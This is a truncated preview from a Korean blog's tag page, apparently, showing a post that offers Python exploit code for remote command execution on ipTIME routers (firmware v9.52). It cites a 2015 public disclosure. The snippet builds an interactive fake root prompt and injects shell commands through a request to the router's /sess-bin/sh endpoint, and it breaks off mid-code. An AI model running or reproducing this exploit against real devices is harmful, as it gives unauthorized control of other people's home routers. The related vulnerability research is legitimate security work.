아이피타임 썸네일형 리스트형 ipTIME 공유기 v9.52 Exploit Code 해당 취약점의 출처 http://pierrekim.github.io/blog/2015-07-01-poc-with-RCE-against-127-iptime-router-models.html 취약점 Exploit 코드가 동작하지 않아 파이썬으로 개발하였습니다. #-*- coding: utf-8 -*- import urllib, urllib2 def attack(): global e url="http://192.168.0.1/sess-bin/sh" payload = "X=X; echo 'Content-type: text/plain';echo;" command=raw_input("root@192.168.0.1:/bin# ") if(command == "exit"): e=1 payload += command+";.. 더보기 이전 1 다음
